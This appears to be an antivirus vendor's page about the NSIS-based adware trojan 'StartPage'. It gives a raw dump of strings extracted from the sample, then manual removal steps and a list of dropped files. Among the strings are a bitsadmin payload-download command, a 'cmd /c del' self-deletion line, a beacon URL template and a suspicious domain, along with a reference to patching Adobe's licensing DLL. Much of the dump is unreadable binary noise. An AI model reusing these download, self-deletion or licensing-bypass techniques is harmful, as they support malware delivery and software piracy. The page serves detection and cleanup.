ForceRemove {dded0858-104b-4eec-a82e-a44b49d78594} = s 'Inst Class'

ProgID = s 'vinyls.tramell.1'

VersionIndependentProgID = s 'vinyls.tramell'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{a0e998a2-81f0-420b-a12b-563442cf5349}'

.sssh

REÚ

\.crr

s1f-'

.DC l

tweb

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

stdole2.tlbWWW(

msgWd

keyNameW

urlW

url2d

YtcmdLineW

P%CreateIconWW

iconUrlW

regKeyWW

CheckRegKeyW

keyWd

W.launchCommandLineWWW

~cmdW

WDIsShortNameInstalledd

Created by MIDL version 7.00.0555 at Mon Nov 21 09:30:06 2016

0%0x0

9!:=:_:}:

0%0 020@0

1$1-161}1

>#>'> >/>3>7>;>

3M4

: :@:\:`:

2 2<2@2`2

2$2,242@2

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

Content-Type: application/x-www-form-urlencoded

shlwapi.dll

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

appimageurl

cmdl

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

\Support Tools\bitsadmin.exe

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

/retrynav %d

Advapi32.dll

shell32.dll

{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}

OLEAUT32.DLL

kernel32.dll

sn=%s&hx=%S&base=%s

rfsw%d

advapi32.dll

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

NT%d.%dSP%d

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

version.dll

OleAut32.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

secularistsarakolet.site

setup.exe_1104:

.idata

.rdata

P.pr0

.reloc

P.rsrc

kernel32.dll

Windows

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

EInvalidGraphicOperation

USER32.DLL

comctl32.dll

uxtheme.dll

PasswordChar

OnKeyDown0

OnKeyPress

OnKeyUp

ssHorizontal

OnKeyUpl

Proportional

%s%s%s%s%s%s%s%s%s%s

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

TKeyEvent

TKeyPressEvent

HelpKeywordDpA

crSQLWait

%s (%s)

imm32.dll

AutoHotkeys

AutoHotkeysH

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState,

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

MAPI32.DLL

ole32.dll

olepro32.dll

1.2.3

Invalid ZStream operation!

Options.dat

msimg32.dll

Cannot load image. %s not supported for %s files.

Cannot load image. Palette in %s file is invalid.

Cannot load image. Invalid or unexpected %s image format.

Cannot load image. CRC error found in %s file.

Cannot load image. Extra compressed data found in %s file.

Cannot load image. Compression error found in %s file.

Invalid color format in %s file.

Conversion between indexed and non-indexed pixel formats is not supported.

Portable network graphics (AlphaControls)

TacMDIWnd

r.uZh

user32.dll

WEBBUTTON

TacMenuSupport

TacMenuSupport$

Webdings

CRASPIPETTE

TacScrollBarsSupport

TacButtonsSupport

TacLabelsSupport

MenuSupport

c:\Skins

1.tmp

.JPEG

2.tmp

Please, update skins to latest or contact the AlphaControls support for upgrading of existing skin.

This version of the skin have not complete support by used AlphaControls package release.

Uh%FN

TAddItemExEvent

DWMAPI.DLL

acMDIIcons

 |$(;<$}?

t.Ht4

lblUrlLeid0

lblUrlLeidMouseMove

lblUrlLeidMouseLeave

lblUrlLeidClick

15.7.0

painter@adobe.com

11.0.0

10.0.0

13.8.1

13.8.0

13.5.0

13.1.1

12.0.0

15.2.0

9.2.1

8.0.0

7.0.0

6.0.0

5.0.0

Auditon-CS5.5.5-Win-GM

4.0.0

1.0.0

16.0.32

15.0.0

13.0.0

11.5.0

14.0.0

20.1.0

19.0.0

18.0.0

17.0.0

16.0.0

15.1.0

9.0.0

8.0.1

7.5.0

10.4.0

17.0.1

12.1.0

6.6.1

3.0.0

spc_player.dll

notepad.exe

"%s" %s

amtlib.dll|amtlib.dll

%s [%s]

Extract DLL: %s

\painter.ini

Extract INI: %s

Adobe\OOBE\PDApp\P6\IMSLib.dll

Adobe\OOBE\PDApp\P7\IMSLib.dll

\IMSLib.dll

\AdobePIP.dll

hXXps://helpx.adobe.com/creative-cloud/packager/creative-cloud-licensing-identifiers.html

inflate 1.2.3 Copyright 1995-2005 Mark Adler

L%6uw&:

.aB#HJ

$.WWb

0123456789.

jC:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll

3uqkernel32.dll

GetKeyboardType

advapi32.dll

RegOpenKeyExA

RegCloseKey

GetCPInfo

version.dll

gdi32.dll

SetViewportOrgEx

GetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MsgWaitForMultipleObjects

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

shell32.dll

ShellExecuteA

comdlg32.dll

GxtÎ

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

operator

activation.php?code=

deactivation.php?hash=

]F.pt

.?AVIUrlBuilderSource@@

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

E!|.HW

.zEKg

%f:"t

i%U/A

%c Zi

.KULO

2.KNLu

.KUL|

#%DQV(

ICMd

mJ%U0

L.Zb)x

g.HE5.

.ru!5

~Sp%x

3.mG9

.TZ/R

\%sT/

<~û

.CsLW4

F_.Ru

-R}{=

g\.Rf,

c>a%C~Y2

&g.DR

AI%fG

IN.CE

$Xû

.YR1u

a.PPSCDi

^4.Un

,&H%x4;

X~6A%U

.YX[;H

%xx8'^

/%b.YO

.FDgv

T×@N

;.bf/7

7-.Cr

s%F-P

jK.Ex

.fNHS

2.JOq

t.nVf

%u 7^

".KKO

.dX@V

.OP|#d

<%s\y

b%UYE

p=-$%x

4[.CBE

%s0[EZ

q-8}(

^#.ZF

`.CsB

ue%S\

O-R}#

q%U>?

%UUX>

' [.Eh

#.Ql2

)@R%S

}.wRDGl

.fNH6

.nn !t

.QJfEg

N[&%X

/H.CZA

]%4x/

Oz}%d:^

\ZXY.Tt

GetConsoleOutputCP

fP/TCP

#GA%f

9 9$9(9,9094989<9@9\9|9

0#0'0 0/0?0

:,;0;4;8;<;@;

3"373<3{3

> >$>(>,>0>4>8><>@>'?

> >$>(>,>

3 3$3(3,303>3

4 4$4(4,4044484<4@4\4|4

0"0&0*0.040

0 1$1,101}1

>"?2?=?~?

=$=6=<=\=

8Ÿ9

8(9,9094989<9

6l6K6h6p6

9#9'9 9/93979;9?9

2 2$2(2,20242:2

8 8$8(8,808

0S0

0 0$0(0,0

.DMi)

version="0.5.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="requireAdministrator" />

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

0.9.0.0

emuext.exe

setup.exe_1104_rwx_00549000_00001000:

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

KERNEL32.DLL

mscoree.dll

setup.exe_1104_rwx_0054D000_00003000:

.?AVIUrlBuilderSource@@

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

setup.exe_1104_rwx_00653000_00001000:

SetViewportOrgEx

MapVirtualKeyA

advapi32.dll

GetKeyboardType

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.NSIS.StartPage_2a8f25cc1f

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.NSIS.StartPage_2a8f25cc1f

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet